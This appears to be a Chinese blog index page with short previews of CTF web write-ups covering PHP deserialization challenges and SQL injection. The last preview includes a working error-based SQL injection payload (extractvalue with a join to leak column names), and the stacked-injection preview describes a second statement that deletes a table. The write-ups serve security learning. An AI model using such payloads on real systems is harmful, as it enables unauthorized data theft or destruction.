3.4k 3 分钟

[强网杯 2019] Upload # 0x00 PHP 的魔法函数 PHP 的所有魔法函数,调用例子。 比较需要记住的是: __toString() 在对象被作为字符串使用时触发 __destruct 对象被摧毁时 调用 __wakeup 对象被唤醒时调用 __construct 被实例化的时候调用 <?php /** * Created by PhpStorm. * User: 27394 * Date: 2016/12/24 * Time: 10:26 */ class A{ public function...
3.1k 3 分钟

[网鼎杯 2020 青龙组] AreUSerialz 源码是这样子的。 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename =...
1.2k 1 分钟

[极客大挑战 2019] PHP 扫描网站目录,发现备份文件,www.zip 在 index.php 中 发现反序列化。 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 构造反序列化字符串,让 username = admin pass=100,由于 private 变量,在反序列化时会参数不可见字符,所以进行一下 url 编码。 <?php include...
1.7k 2 分钟

[强网杯 2019] 随便注 # 0x01 堆叠注入学习 (堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于 SELECT 语句的 UNION 联合查询攻击不同,堆叠注入可以用于执行任何 SQL 语句。 # 堆叠注入原理 在 sql 中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。 # 举个堆叠注入攻击的例子 执行查询时,第一个语句执行信息查询,第二个语句则将表 user 的所有内容给删除了。 mysql> select * from...
1k 1 分钟

比赛名称: 2021CISCN 初赛 # easy_sql: join 爆列名 admin')||extractvalue(1,concat(0x7e,(select * from (select * from flag as a join (select * from flag)b using(id,no))c)))#//Duplicate column name 'e0f1d955-bbba-43c3-b078-a81b3fc4bf28'admin')||(extractvalue(1,concat(0x7e,(select...